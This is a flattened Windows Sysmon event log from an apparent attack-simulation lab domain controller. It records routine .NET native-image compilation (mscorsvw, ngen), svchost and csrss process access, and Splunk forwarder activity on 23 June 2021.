11241100x800000000000000021178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:57.533{4DB9351A-A1F9-60D3-1E04-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12a0-0\Microsoft.WindowsSearch.Commands.dll2021-06-23 21:04:57.533 10341000x800000000000000021177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.455{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-1E04-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.439{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1E04-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.439{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-1E04-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.392{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-1D04-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.376{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1D04-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.376{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-1D04-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:57.345{4DB9351A-A1F9-60D3-1C04-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f98-0\Microsoft.WindowsAuthenticationProtocols.Commands.dll2021-06-23 21:04:57.345 10341000x800000000000000021170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.314{4DB9351A-A1F9-60D3-1B04-00000000CF01}65845332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.236{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-1C04-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.205{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1C04-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.205{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-1C04-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.080{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1F9-60D3-1B04-00000000CF01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-1A04-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.080{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1B04-00000000CF01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1F9-60D3-1B04-00000000CF01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-A1F9-60D3-1B04-00000000CF01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.048{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1A04-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.048{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-1A04-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(w
ow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.017{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=953BC35F7C12B66C87D7F909CD2199A7,SHA256=EB9AFDC833A88576C9C1EB869E16271C110A38283701B94E91E7B89D9DD9DE27,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:57.001{4DB9351A-A1F8-60D3-1904-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13ec-0\Microsoft.Windows.VolumeActivation.Plugin.dll2021-06-23 21:04:57.001 10341000x800000000000000021215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:58.973{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FA-60D3-2604-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.958{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FA-60D3-2604-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:58.958{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FA-60D3-2604-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dl